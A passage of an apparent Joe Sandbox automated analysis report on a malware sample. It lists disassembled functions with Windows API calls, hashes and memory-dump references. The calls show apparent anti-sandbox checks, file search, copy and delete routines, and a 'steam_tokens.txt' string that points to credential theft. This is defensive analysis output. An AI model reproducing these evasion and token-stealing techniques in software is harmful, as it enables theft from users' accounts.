                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                              • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                                                                                                                              • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                                                                                                                              • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                                                                                                                              • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                                                                                                                              Function 00419600 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041963F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                              • Opcode ID: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
                                                                                                                                              • Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
                                                                                                                                              • Opcode Fuzzy Hash: 38bec2c2861d1061a7e63eb7caa5b35248e167512e01a3ac08b79c0d7adc0fad
                                                                                                                                              • Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95
                                                                                                                                              Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401143
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1103761159-0
                                                                                                                                              • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                                                                                                                              • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                                                                                                                              • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                                                                                                                              • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                                                                                                                              Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 544645111-2766056989
                                                                                                                                              • Opcode ID: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
                                                                                                                                              • Instruction ID: 960187402ee01aff1aca01ef16381d87fa4c626a1601440f33a421b94010635f
                                                                                                                                              • Opcode Fuzzy Hash: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
                                                                                                                                              • Instruction Fuzzy Hash: D6213374A04208EFDB04CF88D544BADBBB1FF48304F1181AAD456AB381D3799A91DF85
                                                                                                                                              Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
                                                                                                                                              • Instruction ID: fd8884a5b4d1e95754380b5432cffff504e2d4d7245242e6cdc6148b35b0e1b4
                                                                                                                                              • Opcode Fuzzy Hash: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
                                                                                                                                              • Instruction Fuzzy Hash: 816127B4900209DFCB14CF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95
                                                                                                                                              Function 00414E00 Relevance: 3.1, APIs: 2, Instructions: 118stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414E3A
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0C48), ref: 00414E58
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                                                                                                                                • Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                                                                                                                                • Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
                                                                                                                                                • Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
                                                                                                                                                • Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,009A2030,?,000003E8), ref: 00414C9A
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
                                                                                                                                                • Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
                                                                                                                                                • Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
                                                                                                                                                • Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C57
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2104210347-0
                                                                                                                                              • Opcode ID: 96ca4b8fee943fcefae6de1e709fc3017b10229750f5af120523a159a3f8e737
                                                                                                                                              • Instruction ID: e9161ec81bcd1d29be655bd6d91fa6844fd782dbdf96c1af6834d1d6ae200bb8
                                                                                                                                              • Opcode Fuzzy Hash: 96ca4b8fee943fcefae6de1e709fc3017b10229750f5af120523a159a3f8e737
                                                                                                                                              • Instruction Fuzzy Hash: F041B6B7E0410467C754F764FC52EEE333E9BC8304F40855EB54696191ED78AAC88B95
                                                                                                                                              Function 00415350 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009996C0,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00420ACE,?,?,?,?,?,?,0041635B,?), ref: 0041537A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpylstrlen
                                                                                                                                              • String ID: steam_tokens.txt
                                                                                                                                              • API String ID: 2001356338-401951677
                                                                                                                                              • Opcode ID: 05c3bf2e8d49d1371e3a8ef3ba893d9939886e2072245d48c510c30610a2984f
                                                                                                                                              • Instruction ID: 583e1202a90f05d24a8fafb6f0fe3048dc9e4c24137b9a3722a1f5dcf54c1db9
                                                                                                                                              • Opcode Fuzzy Hash: 05c3bf2e8d49d1371e3a8ef3ba893d9939886e2072245d48c510c30610a2984f
                                                                                                                                              • Instruction Fuzzy Hash: 5AF06D31E1110876CB04FBB2EC679ED733D9E50358F80426EB416220D2EF386698C7AE
                                                                                                                                              Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040117E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitInfoProcessSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 752954902-0
                                                                                                                                              • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                                                                                                                              • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                                                                                                                              • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                                                                                                                              • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66
                                                                                                                                              Function 0040B4C0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040B992
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040B9A6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3457870978-0
                                                                                                                                              • Opcode ID: 322f1442e3a5ebfc2c3a14ac62c7135adb53967e16a71277d5057294c9b92b8f
                                                                                                                                              • Instruction ID: 2255bc3e1aae02863dcd83073914f46634cd1c5da6bc7bd4c07d15e0a17c61c2
                                                                                                                                              • Opcode Fuzzy Hash: 322f1442e3a5ebfc2c3a14ac62c7135adb53967e16a71277d5057294c9b92b8f
                                                                                                                                              • Instruction Fuzzy Hash: BAE14672A111189BCB04FBA1DD66EEE7339AF14314F40459EF10672095EF387B98CB6A
                                                                                                                                              Function 0040AEC0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040B13A
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040B14E
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
